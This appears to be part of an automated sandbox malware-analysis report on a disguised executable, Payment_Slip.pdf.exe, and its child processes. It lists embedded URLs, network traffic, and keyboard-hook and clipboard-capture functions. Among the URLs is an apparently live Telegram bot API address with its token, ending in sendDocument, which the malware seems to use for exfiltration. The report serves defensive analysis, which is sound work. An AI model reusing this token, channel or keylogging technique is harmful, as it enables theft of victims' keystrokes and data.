Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/wr20%
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1242727523.0000000003157000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003195000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.gmail.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242122397.0000000001354000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Windows Update.exe, 0000001A.00000002.3620793390.00000000029D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.or
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.org
Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.orgX
Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.orgt-
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: Payment_Slip.pdf.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003171000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003179000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003175000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003166000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003398000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.000000000342E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/a/answer/166852
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Payment_Slip.pdf.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000 11_2_00409340
Installs a global keyboard hook
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payment_Slip.pdf.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\host.exe
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\conserver.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 11_2_0040A65A
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 11_2_00414EC1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 14_2_0040987A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_004098E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_00406B9A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 15_2_00406C3D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004068B5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 16_2_004072B5
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 17_2_00414EC1
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 11_2_0040A65A
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 11_2_00409468
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\host.exe Window created: window name: CLIPBRDWNDCLASS
